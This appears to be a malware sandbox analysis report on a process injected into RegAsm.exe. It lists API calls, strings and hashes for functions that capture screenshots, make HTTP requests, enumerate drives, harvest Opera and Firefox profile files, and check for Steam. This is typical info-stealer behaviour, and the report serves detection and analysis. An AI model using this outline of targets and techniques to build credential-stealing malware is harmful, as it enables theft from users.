Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera Crypto, xrefs: 0040C09F
Opera GX, xrefs: 0040C091
\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

%DRIVE_FIXED%, xrefs: 00415230
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_REMOVABLE%, xrefs: 00415215

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

